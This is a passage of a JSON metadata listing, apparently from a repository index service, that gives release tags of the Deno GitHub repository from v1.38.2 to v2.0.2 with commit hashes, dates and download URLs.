d/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r